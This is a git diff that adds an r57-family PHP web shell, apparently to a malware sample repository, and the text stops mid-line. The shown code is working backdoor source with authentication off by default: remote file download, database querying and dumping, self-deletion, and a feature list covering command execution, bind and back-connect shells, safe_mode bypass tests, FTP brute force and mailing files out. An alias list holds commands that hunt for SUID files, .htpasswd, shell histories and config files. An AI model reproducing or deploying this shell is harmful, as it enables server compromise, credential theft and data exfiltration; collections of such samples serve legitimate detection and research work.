b/PHP/Backdoor.PHP.Rst.al new file mode 100644 index 00000000..3dbef4f8 --- /dev/null +++ b/PHP/Backdoor.PHP.Rst.al @@ -0,0 +1,2115 @@ +<!-- ALBANIA (n) SECURITY CLAN --> + + +<?php +/******************************************************************************************************/ +/* +/* irc.ascnet.biz +/* +/******************************************************************************************************/ + +// ????? ????? | Language +// $language='ru' - ??????? (russian) +// $language='eng' - english (??????????) +$language='eng'; + +// ?????????????? | Authentification +// $auth = 1; - ?????????????? ???????? ( authentification = On ) +// $auth = 0; - ?????????????? ????????? ( authentification = Off ) +$auth = 0; + +// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access) +// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!) +// ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? 'r57' +// Login & password crypted with md5, default is 'r57' +$name='11f942ba7f384ddcc245810b87f659d5'; // ????? ???????????? (user login) +$pass='11f942ba7f384ddcc245810b87f659d5'; // ?????? ???????????? (user password) +/******************************************************************************************************/ +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = '3.5'; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + $_COOKIE = &$HTTP_COOKIE_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_COOKIE as $k=>$v) + { + $_COOKIE[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="ghhghh"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=sdfsqdfsqdf>ghhghh</a> : Access Denied</b>"); + } +} +$head = '<!-- ??????????, ???? --> +<html> +<head> +<title>powered by => IRC.ASCNET.BIZ <= & => www.asc.sh <= </title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +color: #ff6600; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +color: #ff6600; +} +.table1 { +BORDER: 0px; +BACKGROUND-COLOR: #333333; +color: #ff6600; +} +.td1 { +BORDER: 0px; +font: 7pt Verdana; +color: #ff6600; +} +.tr1 { +BORDER: 0px; +color: #ff6600; +} +table { +BORDER: #eeeeee 1px outset; +BACKGROUND-COLOR: #333333; +color: #ff6600; + +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #990000; +font: 8pt Verdana; +color: #ffff00; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #ffff00; +font: 8pt Verdana; +color: #000000;; +} +submit { +BORDER: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +color: #000000; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #999999; +font: Fixedsys bold; +color: #000000; +} +BODY { +margin: 1px; +background-color: #333333; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE> +<script language=\'javascript\'> +function hide_div(id) +{ + document.getElementById(id).style.display = \'none\'; + document.cookie=id+\'=0;\'; +} +function show_div(id) +{ + document.getElementById(id).style.display = \'block\'; + document.cookie=id+\'=1;\'; +} +function change_divst(id) +{ + if (document.getElementById(id).style.display == \'none\') + show_div(id); + else + hide_div(id); +} +</script>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + $this->dump[] = '## under construction'; + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + default: + return 0; + break; + } + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + + if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; + switch($sql->query($query)) + { + case '0': + echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; + break; + case '1': + if($sql->get_result()) + { + echo "<table width=100%>"; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#660000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); + echo "<tr><td bgcolor=#660000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); + echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; + } + echo "</table>"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; + break; + } + } + } + } + } + echo "<br><form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center>"; + echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; + echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(__FILE__); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#660000><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#660000><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#660000><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#660000><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#660000><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( + +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', +'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()', +'eng_text116'=>'Copy from', +'eng_text117'=>'to', +'eng_text118'=>'File copied', +'eng_text119'=>'Cant copy file', +'eng_text120'=>'Run Command in Safe-Mode <font color=\"red\">Vulnerable</font>', +'eng_text121'=>'<font color=\"red\">Safe-Mode Bypass ON</font>', +'eng_text122'=>'Run Cmd', +'eng_err0'=>'Error! Can\'t write in file ', +'eng_err1'=>'Error! Can\'t read file ', +'eng_err2'=>'Error! Can\'t create ', +'eng_err3'=>'Error! Can\'t connect to ftp', +'eng_err4'=>'Error! Can\'t login on ftp server', +'eng_err5'=>'Error! Can\'t change dir on ftp', +'eng_err6'=>'Error! Can\'t sent mail', +'eng_err7'=>'Mail send', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#660000><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#660000>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Webdings color=gray>4</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = 